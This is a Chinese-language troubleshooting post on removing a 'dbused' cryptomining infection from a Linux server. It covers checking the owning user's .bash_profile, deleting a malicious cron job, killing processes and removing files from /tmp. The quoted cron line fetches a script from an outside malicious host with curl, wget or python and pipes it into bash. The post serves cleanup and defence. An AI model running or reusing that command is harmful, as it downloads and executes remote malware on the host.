现象描述
1、通过xshell连接出现非常严重的卡顿,进入后发现CPU被名为dbused的进程占满了!
当初按照百度和csdn的文档进行处理病毒的时候,都是指标不治本,清理了一段时间第二天打开电脑,它又起来了,就是反反复复很是难受,我总结了一下别人的经验加自己如何处理的。
解决方案:
1.首先查看dbused进程是哪个用户启动的。
2. vim /home/tidb/.bash_profile 这个文件最后一行如果又下面这个命令 一定要删除 注意:哪个用户启动的dbsed就去哪个用户的家目录去查看,这里以tidb为例。
3.cd /var/spool/cron 查看周期性计划任务 并删除下面任务
* * * * * (curl -fsSL http://bash.givemexyz.in/xms||wget -q -O- http://bash.givemexyz.in/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("http://bash.givemexyz.in/xms").read()')| bash -sh; lwp-download http://bash.givemexyz.in/xms /tmp/xms; bash /tmp/xms; /tmp/xms; rm -rf /tmp/xms
4.杀掉进程
kill bashirc
kill dbused
5. 进入到/tmp 目录下删除病毒文件
bashirc dbused sshcheck 都为病毒文件
6.间隔一小时查看病毒是否还会启动